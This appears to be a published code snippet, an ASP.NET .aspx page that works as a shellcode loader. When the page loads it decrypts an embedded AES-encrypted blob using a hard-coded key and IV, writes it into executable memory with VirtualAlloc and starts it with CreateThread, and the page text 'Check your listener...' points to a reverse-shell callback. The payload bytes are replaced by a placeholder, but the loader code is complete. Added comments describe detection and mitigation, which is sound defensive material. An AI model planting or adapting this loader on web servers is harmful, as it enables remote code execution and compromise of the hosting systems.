@MzHmO
Created November 10, 2023 14:48
aspx shellcode
```cs
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
// Native kernel32 imports declared by this page: two memory-allocation calls, thread creation,
// and a pseudo-handle to the current process.
// Defender note: an .aspx page that P/Invokes VirtualAlloc together with CreateThread has no
// ordinary web-application purpose; that combination of imports in web content is a strong
// static indicator of an in-process native-code loader and is worth alerting on.
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
// VirtualAllocExNuma is only called once in Page_Load and its result is never used as a buffer.
[System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
[ System.Runtime.InteropServices.DllImport("kernel32.dll")]
private static extern IntPtr GetCurrentProcess();
// Decrypts `data` with AES using the caller-supplied key and IV and returns the resulting bytes.
// The cipher mode is not set here, so whatever default Aes.Create() provides is used.
// Defender note: the only caller passes a key and IV that are hard-coded in the same page, so the
// encryption hides the blob from static content scanning only; anyone holding the file can
// recover the plaintext offline for analysis.
private byte[] Decrypt(byte[] data, byte[] key, byte[] iv)
{
using (var aes = Aes.Create())
{
aes.KeySize = 256;
aes.BlockSize = 128;
// Zero padding: presumably the decrypted output keeps any trailing zero bytes — confirm when analysing a sample.
aes.Padding = PaddingMode.Zeros;
aes.Key = key;
aes.IV = iv;
using (var decryptor = aes.CreateDecryptor(aes.Key, aes.IV))
{
return PerformCryptography(data, decryptor);
}
}
}
// Runs `data` through the given transform and returns everything the transform produced.
// The transform writes into an in-memory stream; nothing is written to disk here, so the
// decrypted bytes exist only in process memory.
private byte[] PerformCryptography(byte[] data, ICryptoTransform cryptoTransform)
{
using (var ms = new MemoryStream())
using (var cryptoStream = new CryptoStream(ms, cryptoTransform, CryptoStreamMode.Write))
{
cryptoStream.Write(data, 0, data.Length);
// Flush the final block so the last bytes reach the MemoryStream before it is copied out.
cryptoStream.FlushFinalBlock();
return ms.ToArray();
}
}
// Win32 constants passed to VirtualAlloc in Page_Load.
// 0x1000 is MEM_COMMIT; 0x40 is PAGE_EXECUTE_READWRITE (readable, writable and executable).
// Defender note: private RWX regions allocated from managed web code are unusual and are a
// common focus for memory-scanning and EDR allocation telemetry.
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
// Page load handler: decrypts an embedded byte blob and starts it as native code on a new thread
// inside the process that serves the page (for ASP.NET on IIS that is typically the worker
// process — confirm for the host in question). It runs on each request to the page.
// Defender notes:
//  - Detection: new or modified .aspx files under web roots, ASP.NET pages importing kernel32
//    allocation/thread APIs, RWX private memory in the web worker, and threads whose start
//    address lies outside any loaded module.
//  - Mitigation: deny the application identity write access to content directories, monitor
//    web roots for file changes, and run the application pool with least privilege.
protected void Page_Load(object sender, EventArgs e)
{
// Probe allocation: 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x4 = PAGE_READWRITE. The returned region
// is not used or freed anywhere below; only the result of the call is inspected.
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
// NOTE(review): IntPtr is a value type, so this null comparison does not detect a failed
// call; as written, execution always continues past this guard.
if(mem == null)
{
return;
}
// Encrypted payload. The original listing replaces the bytes with a non-code placeholder
// (Russian for "shellcode"), so the page does not compile as published.
byte[] Enc = new byte[688] {
0x46, <шеллкод> ,0x02 };
// 32-byte AES key stored in clear text next to the data it protects.
byte[] Key = new byte[32] {
0x57, 0xef, 0x18, 0x5a, 0x8f, 0xd4, 0x32, 0xbc, 0x4f, 0x39, 0x66, 0x3f, 0x0c, 0x17, 0x0b,
0x1e, 0x9e, 0xb4, 0x82, 0x3e, 0x4d, 0x9d, 0xa9, 0x05, 0x90, 0x23, 0xee, 0x03, 0xa7, 0x81,
0x5f, 0xdd };
// IV
byte[] Iv = new byte[16] {
0x6e, 0x8f, 0xa8, 0xdd, 0xe6, 0x8e, 0xe1, 0x10, 0x63, 0x17, 0x11, 0x02, 0xc8, 0xfb, 0x60,
0x6b };
// Decrypted bytes are held only in a managed array.
byte[] e4qRS= Decrypt(Enc, Key, Iv);
// Allocate an RWX region sized to the decrypted blob; the return value is not checked.
IntPtr zG5fzCKEhae = VirtualAlloc(IntPtr.Zero,(UIntPtr)e4qRS.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Copy the decrypted bytes from the managed array into the native region.
System.Runtime.InteropServices.Marshal.Copy(e4qRS,0,zG5fzCKEhae,e4qRS.Length);
IntPtr aj5QpPE = IntPtr.Zero;
// Start a native thread at the copied buffer. The handle is neither waited on nor closed, so the
// request returns the HTML below while the thread keeps running in the hosting process.
IntPtr oiAJp5aJjiZV = CreateThread(IntPtr.Zero,UIntPtr.Zero,zG5fzCKEhae,IntPtr.Zero,0,ref aj5QpPE);
}
</script>
<!DOCTYPE html>
<html>
<body>
<p>Check your listener...</p>
</body>
</html>
```